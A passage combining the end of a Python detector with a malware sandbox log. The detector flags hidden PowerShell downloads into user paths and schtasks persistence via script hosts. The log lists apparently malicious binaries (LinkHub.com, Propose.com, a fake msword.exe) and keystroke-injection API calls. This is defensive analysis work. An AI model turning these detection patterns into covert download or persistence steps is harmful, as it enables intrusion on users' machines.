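    m = re.search(r"[-/]" + re.escape(name) + r"\s+(\"[^\"]*\"|'[^']*'|\S+)", cmdline, re.I)
    return m.group(1).strip("\"'") if m else ""


def evaluate(cmdline: str) -> List[str]:
    """Names of the checks this command line triggers, in a fixed order."""
    hits: List[str] = []
    prog = program(cmdline)
    if prog in ("powershell", "pwsh"):
        out = arg_value(cmdline, "OutFile")
        if DOWNLOAD_VERBS.search(cmdline) and (HIDDEN_WINDOW.search(cmdline) or USER_WRITABLE.search(out)):
            hits.append("ps_hidden_download_to_user_path")
        dest = arg_value(cmdline, "DestinationPath")
        if re.search(r"Expand-Archive", cmdline, re.I) and USER_WRITABLE.search(dest):
            hits.append("ps_archive_expanded_in_user_path")
    elif prog == "schtasks" and re.search(r"/create\b", cmdline, re.I):
        action = arg_value(cmdline, "tr")              # the task action, quotes stripped
        if SCRIPT_HOSTS.search(action) and USER_WRITABLE.search(action):
            hits.append("schtasks_scripthost_from_user_path")
        if arg_value(cmdline, "sc").lower() == "minute":
            hits.append("schtasks_minute_interval")
    return hits


def scan(events: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Evaluate every (parent, cmdline) pair and keep only the ones that fire."""
    flagged = []
    for parent, cmdline in events:
        hits = evaluate(cmdline)
        if hits:
            flagged.append((parent, cmdline, hits))
    return flagged


if __name__ == "__main__":
    for parent, cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{parent}: {', '.join(hits)}\n    {cmdline}")
```

    On real telemetry, feed (parent image, command line) pairs from Sysmon event 1 or Security event 4688 into scan(). The Startup-folder LinkHub.url from the same section is a file-creation event, not a process creation, and needs a separate check over writes into ...\Start Menu\Programs\Startup.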

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00D026DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,38_2_00D026DD
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C8FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,38_2_00C8FC7C
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
